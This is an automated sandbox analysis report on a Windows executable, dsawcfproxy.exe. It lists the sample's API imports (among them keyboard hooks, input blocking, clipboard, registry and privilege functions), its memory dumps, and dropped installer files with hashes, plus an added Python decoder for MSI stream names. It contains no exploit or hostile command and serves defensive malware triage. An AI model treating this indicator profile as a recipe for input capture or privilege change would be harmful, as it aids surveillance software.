GetCursorInfo - 0x004AE45C 0x000D1F1C 0x000D051C 0x0000011F
GetLastInputInfo - 0x004AE460 0x000D1F20 0x000D0520 0x00000145
GetSystemMenu - 0x004AE464 0x000D1F24 0x000D0524 0x0000017D
GetMenuItemCount - 0x004AE468 0x000D1F28 0x000D0528 0x00000151
GetMenuItemID - 0x004AE46C 0x000D1F2C 0x000D052C 0x00000152
GetSubMenu - 0x004AE470 0x000D1F30 0x000D0530 0x0000017A
GetMenuStringW - 0x004AE474 0x000D1F34 0x000D0534 0x00000158
ExitWindowsEx - 0x004AE478 0x000D1F38 0x000D0538 0x000000F5
SetMenu - 0x004AE47C 0x000D1F3C 0x000D053C 0x0000029C
FlashWindow - 0x004AE480 0x000D1F40 0x000D0540 0x000000FB
GetPropW - 0x004AE484 0x000D1F44 0x000D0544 0x0000016B
SetPropW - 0x004AE488 0x000D1F48 0x000D0548 0x000002AD
RemovePropW - 0x004AE48C 0x000D1F4C 0x000D054C 0x00000269
MapWindowPoints - 0x004AE490 0x000D1F50 0x000D0550 0x00000209
RedrawWindow - 0x004AE494 0x000D1F54 0x000D0554 0x0000024A
SetParent - 0x004AE498 0x000D1F58 0x000D0558 0x000002A6
GetClassInfoExW - 0x004AE49C 0x000D1F5C 0x000D055C 0x0000010D
DefDlgProcW - 0x004AE4A0 0x000D1F60 0x000D0560 0x00000095
GetAncestor - 0x004AE4A4 0x000D1F64 0x000D0564 0x00000104
UpdateWindow - 0x004AE4A8 0x000D1F68 0x000D0568 0x00000311
GetMessagePos - 0x004AE4AC 0x000D1F6C 0x000D056C 0x0000015B
GetClassLongW - 0x004AE4B0 0x000D1F70 0x000D0570 0x00000110
CallWindowProcW - 0x004AE4B4 0x000D1F74 0x000D0574 0x0000001E
CheckRadioButton - 0x004AE4B8 0x000D1F78 0x000D0578 0x00000041
IntersectRect - 0x004AE4BC 0x000D1F7C 0x000D057C 0x000001BD
GetUpdateRect - 0x004AE4C0 0x000D1F80 0x000D0580 0x00000187
PtInRect - 0x004AE4C4 0x000D1F84 0x000D0584 0x00000240
CreateDialogIndirectParamW - 0x004AE4C8 0x000D1F88 0x000D0588 0x00000061
CreateAcceleratorTableW - 0x004AE4CC 0x000D1F8C 0x000D058C 0x00000058
DestroyAcceleratorTable - 0x004AE4D0 0x000D1F90 0x000D0590 0x000000A0
InsertMenuItemW - 0x004AE4D4 0x000D1F94 0x000D0594 0x000001B9
SetMenuDefaultItem - 0x004AE4D8 0x000D1F98 0x000D0598 0x0000029E
RemoveMenu - 0x004AE4DC 0x000D1F9C 0x000D059C 0x00000267
SetMenuItemInfoW - 0x004AE4E0 0x000D1FA0 0x000D05A0 0x000002A2
IsMenu - 0x004AE4E4 0x000D1FA4 0x000D05A4 0x000001D2
GetMenuItemInfoW - 0x004AE4E8 0x000D1FA8 0x000D05A8 0x00000154
CreateMenu - 0x004AE4EC 0x000D1FAC 0x000D05AC 0x0000006A
CreatePopupMenu - 0x004AE4F0 0x000D1FB0 0x000D05B0 0x0000006B
SetMenuInfo - 0x004AE4F4 0x000D1FB4 0x000D05B4 0x0000029F
AppendMenuW - 0x004AE4F8 0x000D1FB8 0x000D05B8 0x0000000A
DestroyMenu - 0x004AE4FC 0x000D1FBC 0x000D05BC 0x000000A4
TrackPopupMenuEx - 0x004AE500 0x000D1FC0 0x000D05C0 0x000002F7
CopyImage - 0x004AE504 0x000D1FC4 0x000D05C4 0x00000054
SetActiveWindow - 0x004AE508 0x000D1FC8 0x000D05C8 0x0000027F
CreateIconFromResourceEx - 0x004AE50C 0x000D1FCC 0x000D05CC 0x00000066
EnumClipboardFormats - 0x004AE510 0x000D1FD0 0x000D05D0 0x000000E0
GetWindow - 0x004AE514 0x000D1FD4 0x000D05D4 0x0000018E
BringWindowToTop - 0x004AE518 0x000D1FD8 0x000D05D8 0x00000010
GetTopWindow - 0x004AE51C 0x000D1FDC 0x000D05DC 0x00000185
GetQueueStatus - 0x004AE520 0x000D1FE0 0x000D05E0 0x0000016C
PostQuitMessage - 0x004AE524 0x000D1FE4 0x000D05E4 0x00000237
LoadImageW - 0x004AE528 0x000D1FE8 0x000D05E8 0x000001EF
IsWindowVisible - 0x004AE52C 0x000D1FEC 0x000D05EC 0x000001E0
SetClipboardViewer - 0x004AE530 0x000D1FF0 0x000D05F0 0x00000287
LoadAcceleratorsW - 0x004AE534 0x000D1FF4 0x000D05F4 0x000001E5
EnableMenuItem - 0x004AE538 0x000D1FF8 0x000D05F8 0x000000D6
GetMenu - 0x004AE53C 0x000D1FFC 0x000D05FC 0x0000014B
CreateWindowExW - 0x004AE540 0x000D2000 0x000D0600 0x0000006E
RegisterClassExW - 0x004AE544 0x000D2004 0x000D0604 0x0000024D
LoadCursorW - 0x004AE548 0x000D2008 0x000D0608 0x000001EB
DestroyIcon - 0x004AE54C 0x000D200C 0x000D060C 0x000000A3
DestroyWindow - 0x004AE550 0x000D2010 0x000D0610 0x000000A6
IsCharAlphaW - 0x004AE554 0x000D2014 0x000D0614 0x000001C4
MapVirtualKeyW - 0x004AE558 0x000D2018 0x000D0618 0x00000208
VkKeyScanExW - 0x004AE55C 0x000D201C 0x000D061C 0x00000320
MapVirtualKeyExW - 0x004AE560 0x000D2020 0x000D0620 0x00000207
GetKeyboardLayoutNameW - 0x004AE564 0x000D2024 0x000D0624 0x00000141
ActivateKeyboardLayout - 0x004AE568 0x000D2028 0x000D0628 0x00000000
GetGUIThreadInfo - 0x004AE56C 0x000D202C 0x000D062C 0x0000012E
GetWindowTextW - 0x004AE570 0x000D2030 0x000D0630 0x000001A3
mouse_event - 0x004AE574 0x000D2034 0x000D0634 0x00000331
WindowFromPoint - 0x004AE578 0x000D2038 0x000D0638 0x0000032C
GetSystemMetrics - 0x004AE57C 0x000D203C 0x000D063C 0x0000017E
keybd_event - 0x004AE580 0x000D2040 0x000D0640 0x00000330
SetKeyboardState - 0x004AE584 0x000D2044 0x000D0644 0x00000296
GetKeyboardState - 0x004AE588 0x000D2048 0x000D0648 0x00000142
GetCursorPos - 0x004AE58C 0x000D204C 0x000D064C 0x00000120
GetAsyncKeyState - 0x004AE590 0x000D2050 0x000D0650 0x00000107
AttachThreadInput - 0x004AE594 0x000D2054 0x000D0654 0x0000000C
SendInput - 0x004AE598 0x000D2058 0x000D0658 0x00000276
RegisterHotKey - 0x004AE59C 0x000D205C 0x000D065C 0x00000256
SendMessageTimeoutW - 0x004AE5A0 0x000D2060 0x000D0660 0x0000027B
UnhookWindowsHookEx - 0x004AE5A4 0x000D2064 0x000D0664 0x00000300
SetWindowsHookExW - 0x004AE5A8 0x000D2068 0x000D0668 0x000002CF
PostThreadMessageW - 0x004AE5AC 0x000D206C 0x000D066C 0x00000239
IsCharAlphaNumericW - 0x004AE5B0 0x000D2070 0x000D0670 0x000001C3
IsCharUpperW - 0x004AE5B4 0x000D2074 0x000D0674 0x000001C8
IsCharLowerW - 0x004AE5B8 0x000D2078 0x000D0678 0x000001C6
ToUnicodeEx - 0x004AE5BC 0x000D207C 0x000D067C 0x000002F4
GetKeyboardLayout - 0x004AE5C0 0x000D2080 0x000D0680 0x0000013E
CallNextHookEx - 0x004AE5C4 0x000D2084 0x000D0684 0x0000001C
CharLowerW - 0x004AE5C8 0x000D2088 0x000D0688 0x0000002E
ReleaseDC - 0x004AE5CC 0x000D208C 0x000D068C 0x00000265
GetDC - 0x004AE5D0 0x000D2090 0x000D0690 0x00000121
MessageBoxW - 0x004AE5D4 0x000D2094 0x000D0694 0x00000215
OpenClipboard - 0x004AE5D8 0x000D2098 0x000D0698 0x00000226
GetClipboardData - 0x004AE5DC 0x000D209C 0x000D069C 0x00000116
GetClipboardFormatNameW - 0x004AE5E0 0x000D20A0 0x000D06A0 0x00000118
CloseClipboard - 0x004AE5E4 0x000D20A4 0x000D06A4 0x00000049
SetClipboardData - 0x004AE5E8 0x000D20A8 0x000D06A8 0x00000286
EmptyClipboard - 0x004AE5EC 0x000D20AC 0x000D06AC 0x000000D5
PostMessageW - 0x004AE5F0 0x000D20B0 0x000D06B0 0x00000236
FindWindowW - 0x004AE5F4 0x000D20B4 0x000D06B4 0x000000FA
EndDialog - 0x004AE5F8 0x000D20B8 0x000D06B8 0x000000DA
IsWindow - 0x004AE5FC 0x000D20BC 0x000D06BC 0x000001DB
DispatchMessageW - 0x004AE600 0x000D20C0 0x000D06C0 0x000000AF
TranslateMessage - 0x004AE604 0x000D20C4 0x000D06C4 0x000002FC
ShowWindow - 0x004AE608 0x000D20C8 0x000D06C8 0x000002DF
CountClipboardFormats - 0x004AE60C 0x000D20CC 0x000D06CC 0x00000056
ClientToScreen - 0x004AE610 0x000D20D0 0x000D06D0 0x00000047
EnumChildWindows - 0x004AE614 0x000D20D4 0x000D06D4 0x000000DF
MoveWindow - 0x004AE618 0x000D20D8 0x000D06D8 0x0000021B
GetWindowRect - 0x004AE61C 0x000D20DC 0x000D06DC 0x0000019C
GetMonitorInfoW - 0x004AE620 0x000D20E0 0x000D06E0 0x0000015F
MonitorFromPoint - 0x004AE624 0x000D20E4 0x000D06E4 0x00000218
GetClientRect - 0x004AE628 0x000D20E8 0x000D06E8 0x00000114
SystemParametersInfoW - 0x004AE62C 0x000D20EC 0x000D06EC 0x000002EC
AdjustWindowRectEx - 0x004AE630 0x000D20F0 0x000D06F0 0x00000003
DrawTextW - 0x004AE634 0x000D20F4 0x000D06F4 0x000000D0
SetRect - 0x004AE638 0x000D20F8 0x000D06F8 0x000002AE
GetIconInfo - 0x004AE63C 0x000D20FC 0x000D06FC 0x00000133
CreateIconIndirect - 0x004AE640 0x000D2100 0x000D0700 0x00000067
SetWindowTextW - 0x004AE644 0x000D2104 0x000D0704 0x000002CB
SetWindowLongW - 0x004AE648 0x000D2108 0x000D0708 0x000002C4
ScreenToClient - 0x004AE64C 0x000D210C 0x000D070C 0x0000026D
IsDialogMessageW - 0x004AE650 0x000D2110 0x000D0710 0x000001CD
SendMessageW - 0x004AE654 0x000D2114 0x000D0714 0x0000027C
IsWindowEnabled - 0x004AE658 0x000D2118 0x000D0718 0x000001DC
GetWindowLongW - 0x004AE65C 0x000D211C 0x000D071C 0x00000196
GetKeyState - 0x004AE660 0x000D2120 0x000D0720 0x0000013D
TranslateAcceleratorW - 0x004AE664 0x000D2124 0x000D0724 0x000002FA
KillTimer - 0x004AE668 0x000D2128 0x000D0728 0x000001E3
PeekMessageW - 0x004AE66C 0x000D212C 0x000D072C 0x00000233
GetFocus - 0x004AE670 0x000D2130 0x000D0730 0x0000012C
GetClassNameW - 0x004AE674 0x000D2134 0x000D0734 0x00000112
GetWindowThreadProcessId - 0x004AE678 0x000D2138 0x000D0738 0x000001A4
GetForegroundWindow - 0x004AE67C 0x000D213C 0x000D073C 0x0000012D
GetMessageW - 0x004AE680 0x000D2140 0x000D0740 0x0000015D
SetTimer - 0x004AE684 0x000D2144 0x000D0744 0x000002BB
GetParent - 0x004AE688 0x000D2148 0x000D0748 0x00000164
GetDlgCtrlID - 0x004AE68C 0x000D214C 0x000D074C 0x00000126
CharUpperW - 0x004AE690 0x000D2150 0x000D0750 0x0000003C
IsClipboardFormatAvailable - 0x004AE694 0x000D2154 0x000D0754 0x000001CA
BlockInput - 0x004AE698 0x000D2158 0x000D0758 0x0000000F
ChangeClipboardChain - 0x004AE69C 0x000D215C 0x000D075C 0x00000022
CheckMenuItem - 0x004AE6A0 0x000D2160 0x000D0760 0x0000003F
UnregisterHotKey - 0x004AE6A4 0x000D2164 0x000D0764 0x00000308
GDI32.dll (34)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GdiFlush - 0x004AE080 0x000D1B40 0x000D0140 0x00000175
CreateDIBSection - 0x004AE084 0x000D1B44 0x000D0144 0x00000035
EnumFontFamiliesExW - 0x004AE088 0x000D1B48 0x000D0148 0x00000125
SetBrushOrgEx - 0x004AE08C 0x000D1B4C 0x000D014C 0x00000282
SetBkColor - 0x004AE090 0x000D1B50 0x000D0150 0x0000027E
GetPixel - 0x004AE094 0x000D1B54 0x000D0154 0x00000204
BitBlt - 0x004AE098 0x000D1B58 0x000D0158 0x00000013
CreatePatternBrush - 0x004AE09C 0x000D1B5C 0x000D015C 0x0000004A
SetBkMode - 0x004AE0A0 0x000D1B60 0x000D0160 0x0000027F
GetCharABCWidthsW - 0x004AE0A4 0x000D1B64 0x000D0164 0x000001B5
GetClipBox - 0x004AE0A8 0x000D1B68 0x000D0168 0x000001C0
FillRgn - 0x004AE0AC 0x000D1B6C 0x000D016C 0x00000142
GetClipRgn - 0x004AE0B0 0x000D1B70 0x000D0170 0x000001C1
ExcludeClipRect - 0x004AE0B4 0x000D1B74 0x000D0174 0x00000131
GetDeviceCaps - 0x004AE0B8 0x000D1B78 0x000D0178 0x000001CB
DeleteObject - 0x004AE0BC 0x000D1B7C 0x000D017C 0x000000E6
CreateFontW - 0x004AE0C0 0x000D1B80 0x000D0180 0x00000041
CreateSolidBrush - 0x004AE0C4 0x000D1B84 0x000D0184 0x00000054
CreateCompatibleBitmap - 0x004AE0C8 0x000D1B88 0x000D0188 0x0000002F
GetSystemPaletteEntries - 0x004AE0CC 0x000D1B8C 0x000D018C 0x00000212
GetDIBits - 0x004AE0D0 0x000D1B90 0x000D0190 0x000001CA
CreateCompatibleDC - 0x004AE0D4 0x000D1B94 0x000D0194 0x00000030
CreatePolygonRgn - 0x004AE0D8 0x000D1B98 0x000D0198 0x0000004E
CreateRectRgn - 0x004AE0DC 0x000D1B9C 0x000D019C 0x0000004F
CreateRoundRectRgn - 0x004AE0E0 0x000D1BA0 0x000D01A0 0x00000051
CreateEllipticRgn - 0x004AE0E4 0x000D1BA4 0x000D01A4 0x00000038
DeleteDC - 0x004AE0E8 0x000D1BA8 0x000D01A8 0x000000E3
GetObjectW - 0x004AE0EC 0x000D1BAC 0x000D01AC 0x000001FD
GetTextMetricsW - 0x004AE0F0 0x000D1BB0 0x000D01B0 0x00000226
GetTextFaceW - 0x004AE0F4 0x000D1BB4 0x000D01B4 0x00000224
SelectObject - 0x004AE0F8 0x000D1BB8 0x000D01B8 0x00000277
GetStockObject - 0x004AE0FC 0x000D1BBC 0x000D01BC 0x0000020D
CreateDCW - 0x004AE100 0x000D1BC0 0x000D01C0 0x00000032
SetTextColor - 0x004AE104 0x000D1BC4 0x000D01C4 0x000002A6
COMDLG32.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CommDlgExtendedError - 0x004AE070 0x000D1B30 0x000D0130 0x00000004
GetOpenFileNameW - 0x004AE074 0x000D1B34 0x000D0134 0x0000000C
GetSaveFileNameW - 0x004AE078 0x000D1B38 0x000D0138 0x0000000E
ADVAPI32.dll (19)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetUserNameW - 0x004AE000 0x000D1AC0 0x000D00C0 0x00000165
LockServiceDatabase - 0x004AE004 0x000D1AC4 0x000D00C4 0x00000188
OpenSCManagerW - 0x004AE008 0x000D1AC8 0x000D00C8 0x000001F9
RegEnumKeyExW - 0x004AE00C 0x000D1ACC 0x000D00CC 0x0000024F
RegEnumValueW - 0x004AE010 0x000D1AD0 0x000D00D0 0x00000252
RegQueryInfoKeyW - 0x004AE014 0x000D1AD4 0x000D00D4 0x00000268
RegOpenKeyExW - 0x004AE018 0x000D1AD8 0x000D00D8 0x00000261
RegCloseKey - 0x004AE01C 0x000D1ADC 0x000D00DC 0x00000230
RegDeleteValueW - 0x004AE020 0x000D1AE0 0x000D00E0 0x00000248
RegDeleteKeyW - 0x004AE024 0x000D1AE4 0x000D00E4 0x00000244
RegSetValueExW - 0x004AE028 0x000D1AE8 0x000D00E8 0x0000027E
RegCreateKeyExW - 0x004AE02C 0x000D1AEC 0x000D00EC 0x00000239
RegQueryValueExW - 0x004AE030 0x000D1AF0 0x000D00F0 0x0000026E
AdjustTokenPrivileges - 0x004AE034 0x000D1AF4 0x000D00F4 0x0000001F
LookupPrivilegeValueW - 0x004AE038 0x000D1AF8 0x000D00F8 0x00000197
OpenProcessToken - 0x004AE03C 0x000D1AFC 0x000D00FC 0x000001F7
CloseServiceHandle - 0x004AE040 0x000D1B00 0x000D0100 0x00000057
RegConnectRegistryW - 0x004AE044 0x000D1B04 0x000D0104 0x00000234
UnlockServiceDatabase - 0x004AE048 0x000D1B08 0x000D0108 0x00000300
SHELL32.dll (13)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DragQueryPoint - 0x004AE3C8 0x000D1E88 0x000D0488 0x00000020
SHEmptyRecycleBinW - 0x004AE3CC 0x000D1E8C 0x000D048C 0x000000A5
SHFileOperationW - 0x004AE3D0 0x000D1E90 0x000D0490 0x000000AC
SHGetPathFromIDListW - 0x004AE3D4 0x000D1E94 0x000D0494 0x000000D7
SHBrowseForFolderW - 0x004AE3D8 0x000D1E98 0x000D0498 0x0000007B
SHGetDesktopFolder - 0x004AE3DC 0x000D1E9C 0x000D049C 0x000000B6
SHGetMalloc - 0x004AE3E0 0x000D1EA0 0x000D04A0 0x000000CF
SHGetFolderPathW - 0x004AE3E4 0x000D1EA4 0x000D04A4 0x000000C3
ShellExecuteExW - 0x004AE3E8 0x000D1EA8 0x000D04A8 0x00000121
Shell_NotifyIconW - 0x004AE3EC 0x000D1EAC 0x000D04AC 0x0000012E
DragFinish - 0x004AE3F0 0x000D1EB0 0x000D04B0 0x0000001B
DragQueryFileW - 0x004AE3F4 0x000D1EB4 0x000D04B4 0x0000001F
ExtractIconW - 0x004AE3F8 0x000D1EB8 0x000D04B8 0x0000002B
ole32.dll (10)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
OleInitialize - 0x004AE764 0x000D2224 0x000D0824 0x00000132
OleUninitialize - 0x004AE768 0x000D2228 0x000D0828 0x00000149
CoCreateInstance - 0x004AE76C 0x000D222C 0x000D082C 0x00000010
CoInitialize - 0x004AE770 0x000D2230 0x000D0830 0x0000003E
CoUninitialize - 0x004AE774 0x000D2234 0x000D0834 0x0000006C
CLSIDFromString - 0x004AE778 0x000D2238 0x000D0838 0x00000008
CLSIDFromProgID - 0x004AE77C 0x000D223C 0x000D083C 0x00000006
CoGetObject - 0x004AE780 0x000D2240 0x000D0840 0x00000035
StringFromGUID2 - 0x004AE784 0x000D2244 0x000D0844 0x00000179
CreateStreamOnHGlobal - 0x004AE788 0x000D2248 0x000D0848 0x00000086
OLEAUT32.dll (20)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
OleLoadPicture 0x000001A2 0x004AE368 0x000D1E28 0x000D0428 -
SafeArrayUnaccessData 0x00000018 0x004AE36C 0x000D1E2C 0x000D042C -
SafeArrayGetElemsize 0x00000012 0x004AE370 0x000D1E30 0x000D0430 -
SafeArrayAccessData 0x00000017 0x004AE374 0x000D1E34 0x000D0434 -
SafeArrayUnlock 0x00000016 0x004AE378 0x000D1E38 0x000D0438 -
SafeArrayPtrOfIndex 0x00000094 0x004AE37C 0x000D1E3C 0x000D043C -
SafeArrayLock 0x00000015 0x004AE380 0x000D1E40 0x000D0440 -
SafeArrayDestroy 0x00000010 0x004AE384 0x000D1E44 0x000D0444 -
GetActiveObject 0x00000023 0x004AE388 0x000D1E48 0x000D0448 -
SysStringLen 0x00000007 0x004AE38C 0x000D1E4C 0x000D044C -
SysFreeString 0x00000006 0x004AE390 0x000D1E50 0x000D0450 -
SafeArrayCreate 0x0000000F 0x004AE394 0x000D1E54 0x000D0454 -
VariantClear 0x00000009 0x004AE398 0x000D1E58 0x000D0458 -
VariantChangeType 0x0000000C 0x004AE39C 0x000D1E5C 0x000D045C -
SysAllocString 0x00000002 0x004AE3A0 0x000D1E60 0x000D0460 -
SafeArrayCopy 0x0000001B 0x004AE3A4 0x000D1E64 0x000D0464 -
VariantCopyInd 0x0000000B 0x004AE3A8 0x000D1E68 0x000D0468 -
SafeArrayGetUBound 0x00000013 0x004AE3AC 0x000D1E6C 0x000D046C -
SafeArrayGetLBound 0x00000014 0x004AE3B0 0x000D1E70 0x000D0470 -
SafeArrayGetDim 0x00000011 0x004AE3B4 0x000D1E74 0x000D0474 -
Memory Dumps (15)
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point YARA
dsawcfproxy.exe 3 0x00400000 0x004E8FFF Relevant Image False 32-bit 0x0049F160 False
buffer 3 0x008B2000 0x008EFFFF First Network Behavior False 32-bit - False
buffer 3 0x002311F8 0x002319F7 First Network Behavior False 32-bit - False
buffer 3 0x00231AE0 0x00231C6F First Network Behavior False 32-bit - False
buffer 3 0x00232B90 0x00232C0F First Network Behavior False 32-bit - False
buffer 3 0x00232C18 0x00232E37 First Network Behavior False 32-bit - False
buffer 3 0x00232E40 0x0023343F First Network Behavior False 32-bit - False
buffer 3 0x00233448 0x00235567 First Network Behavior False 32-bit - False
buffer 3 0x00235570 0x002363DF First Network Behavior False 32-bit - False
buffer 3 0x002363E8 0x0023E3E7 First Network Behavior False 32-bit - False
buffer 3 0x02160048 0x02170047 First Network Behavior False 32-bit - False
buffer 3 0x02170050 0x02170FEF First Network Behavior False 32-bit - False
buffer 3 0x02170FF8 0x02171187 First Network Behavior False 32-bit - False
dsawcfproxy.exe 3 0x00400000 0x004E8FFF First Network Behavior False 32-bit 0x0049C9AF False
dsawcfproxy.exe 3 0x00400000 0x004E8FFF Final Dump False 32-bit - False
C:\Windows\Installer\16eda53.ipi Dropped File OLE Compound
Clean
MIME Type application/CDFV2
File Size 20.00 KB
MD5 8d59c1a478b44f7f3436646404f7e476
SHA1 533aae9fa360feafadf8a67a7d9cb4848d476bc9
SHA256 f053da3b0bdd4adb7aa30f49a9c386865ecf3da75dd1e964c5729a0d6e110d29
SSDeep 48:BGnSEElm8luTMwvoS5GnqcCuSidPzSIlilQp4:BGSEEAQwgLCWJV4
ImpHash -
CFB Streams (17)
Name ID Size Actions
Root\䕙䇲䆸㲷䠧 1 76 Bytes
Root\䕙䇲䆸㷷䐤䠨 2 32 Bytes
Root\䒕䒪㾱䈶䠵 3 18 Bytes
Root\䈜䈯䗦䒬䖱 4 40 Bytes
Root\䒏䇯䕨䠶 5 114 Bytes
Root\䕙䓲䕨䌷䖨 6 650 Bytes
Root\䌝䈰䗜䐤㵳䚲 7 20 Bytes
Root\䌝䈰䗜䐤㱳䊬䠫 8 16 Bytes
Root\䄍䄷䄥䈶䄙䋷 9 64 Bytes
Root\䌍䎶䕙䐲䗳 10 0 Bytes -
Root\䌍䎶䈜䌵䏤 11 0 Bytes -
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨 12 2 Bytes
Root\䉊䈷㻵䅨䒲䠷 13 0 Bytes -
Root\䕝䑤䄶䗦䒬㷱䐤䠨 14 122 Bytes
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺 15 20 Bytes
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪 16 16 Bytes
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱 17 2 Bytes
C:\Windows\Installer\16eda53.ipi Dropped File OLE Compound
Clean
MIME Type application/CDFV2
File Size 20.00 KB
MD5 a542c58f5503deb6f55bb9081bef7563
SHA1 5ee2735f037a532fb745ebf7ad493ed6b42c66bf
SHA256 7e4117cf237805c09ff03fc4e6a96a70c58765f4d9c1ecbf92c1ac0d1036534e
SSDeep 48:V0RcDHJludMwvoS5GnqcCuSidPzSIlilQp4:V8P6wgLCWJV4
ImpHash -
CFB Streams (17)
Name ID Size Actions
Root\䕙䇲䆸㲷䠧 1 0 Bytes -
Root\䕙䇲䆸㷷䐤䠨 2 0 Bytes -
Root\䒕䒪㾱䈶䠵 3 18 Bytes
Root\䈜䈯䗦䒬䖱 4 0 Bytes -
Root\䒏䇯䕨䠶 5 0 Bytes -
Root\䕙䓲䕨䌷䖨 6 0 Bytes -
Root\䌝䈰䗜䐤㵳䚲 7 0 Bytes -
Root\䌝䈰䗜䐤㱳䊬䠫 8 0 Bytes -
Root\䄍䄷䄥䈶䄙䋷 9 0 Bytes -
Root\䌍䎶䕙䐲䗳 10 0 Bytes -
Root\䌍䎶䈜䌵䏤 11 0 Bytes -
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨 12 2 Bytes
Root\䉊䈷㻵䅨䒲䠷 13 0 Bytes -
Root\䕝䑤䄶䗦䒬㷱䐤䠨 14 122 Bytes
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺 15 20 Bytes
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪 16 16 Bytes
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱 17 2 Bytes
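The stream names in the two CFB Streams tables above are not mis-encoded output: Windows Installer writes the names of its table and property streams into the OLE compound file with a private packing of the 64-symbol alphabet "0-9A-Za-z._" into code units in the range U+3800..U+4840, so any generic OLE viewer lists them as CJK characters. The decoder below is an added example for both tables (it is not VMRay's code and not part of the sample); it follows the open-source reimplementation of the transform in Wine's msi/table.c (decode_streamname and its encoder counterpart). Rendering the 0x4840 table marker as a leading "!" is this script's own convention, and the sample inputs are the first three stream names copied from the tables above.

```python
# Decoder/encoder for obfuscated Windows Installer (MSI/IPI) OLE stream names.
# Added example, not VMRay code. Algorithm as in Wine's msi/table.c:
#   - a code unit in [0x3800, 0x4800) packs two alphabet symbols, 6 bits each
#     (low 6 bits = first symbol, next 6 bits = second symbol);
#   - a code unit in [0x4800, 0x4840) holds one trailing symbol;
#   - 0x4840 is the marker that the stream is a database table.
ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._"

TABLE_MARKER = 0x4840
TABLE_MARKER_TEXT = "!"   # this script's own rendering of the table marker


def _sym(v: int) -> str:
    return ALPHABET[v & 0x3F]


def decode_stream_name(name: str) -> str:
    """Turn an encoded OLE stream name back into the installer's own name."""
    # VMRay prefixes every stream with the storage path "Root\"; drop it.
    if name.startswith("Root\\"):
        name = name[len("Root\\"):]
    out = []
    for ch in name:
        cp = ord(ch)
        if 0x3800 <= cp < 0x4800:
            cp -= 0x3800
            out.append(_sym(cp))          # first symbol
            out.append(_sym(cp >> 6))     # second symbol
        elif 0x4800 <= cp < TABLE_MARKER:
            out.append(_sym(cp - 0x4800))  # single trailing symbol
        elif cp == TABLE_MARKER:
            out.append(TABLE_MARKER_TEXT)
        else:
            out.append(ch)                # anything else is stored verbatim
    return "".join(out)


def encode_stream_name(name: str, table: bool = False) -> str:
    """Inverse transform, used here to check the decoder round-trips."""
    out = [chr(TABLE_MARKER)] if table else []
    i = 0
    while i < len(name):
        a = ALPHABET.find(name[i])
        if a < 0:                         # not in the alphabet: stored verbatim
            out.append(name[i])
            i += 1
            continue
        b = ALPHABET.find(name[i + 1]) if i + 1 < len(name) else -1
        if b >= 0:                        # pair fits in one code unit
            out.append(chr(0x3800 + a + (b << 6)))
            i += 2
        else:                             # lone trailing symbol
            out.append(chr(0x4800 + a))
            i += 1
    return "".join(out)


# Constructed input: the first three stream names from the report's CFB Streams table.
REPORT_STREAMS = [
    "Root\\䕙䇲䆸㲷䠧",
    "Root\\䕙䇲䆸㷷䐤䠨",
    "Root\\䒕䒪㾱䈶䠵",
]


def decode_all(names):
    """Map each raw stream name to its decoded form."""
    return {n: decode_stream_name(n) for n in names}


if __name__ == "__main__":
    for raw, plain in decode_all(REPORT_STREAMS).items():
        print(f"{raw!r} -> {plain}")
```

On the three names above the decoder yields ProductId, ProductName and LogonUser; the remaining rows of both tables decode the same way, and the identical transform applies to the streams of an .msi package, which is where the table-marker case matters.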
c:\users\keecfmwgj\appdata\local\temp\~dfdf78cdc09372e4a9.tmp Dropped File Stream
Clean
MIME Type application/octet-stream
File Size 68.00 KB
MD5 ff1892d34524721376272d0b01231ad0
SHA1 a38dfd05822f5fffb3f59bc6d0a718b92b8ec399
SHA256 f9aa645b2a0abb03833094fe66ea6af5fd75e07e6a2ea992843bfcc2ccab1a7f
SSDeep 24:+4O+lQyil3ZipVsZipV7V8nZgNlG1CsGgSi+It3rVZkM0+IBDvY:+4rQyilpS4S5GnqcCuSidPV0RM
ImpHash -
C:\Windows\Installer\MSIB37E.tmp Dropped File Stream
Clean
MIME Type application/octet-stream
File Size 50.52 KB
MD5 cc04e66518a449541aa8b33cfda3341b
SHA1 4d34cabf2a976b1e5cecbf6de7bbfaff53fbc3bf
SHA256 2a9567c01f51afffe7b34ded6601112ce59261736b6eae10ba72260aee673a0d
SSDeep 384:5R8YUsO8LkFN4OIryI8J3Y2JB36E45nHQd:5N8HIryIc3YaB36E45nHQd
ImpHash -
C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Installer\{49FBE0A1-9D8A-4E7D-B2BE-75D34CFA641C}\IconFile1__F4EEAA8E_E978_4D54_B160_638656A127CE_.ico Dropped File Image
Clean
Known to be clean.
MIME Type image/vnd.microsoft.icon
File Size 48.12 KB
MD5 6057dbeb81b98203080d3927b487ea04
SHA1 17eb1a2ceef5241fba4be211a0c27708679f01d0
SHA256 7d86c0663024b5191f495857a6196b89857ebcf4e3d8fc4df17ee57590af03e0
SSDeep 192:3GfYUsO8CcC7FN4OIrFkVI8yY3rUs7VJB34jE45nHQwT:EYUsO8LkFN4OIryI8J3Y2JB36E45nHQ
ImpHash -
File Reputation Information: Verdict Clean (Known to be clean.)
c:\users\keecfmwgj\appdata\local\temp\cookies\index.dat Dropped File Stream
Clean
Known to be clean.
Also Known As c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\index.dat (Dropped File)
MIME Type application/octet-stream
File Size 16.00 KB
MD5 d7a950fefd60dbaa01df2d85fefb3862
SHA1 15740b197555ba8e162c37a60ba655151e3bebae
SHA256 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
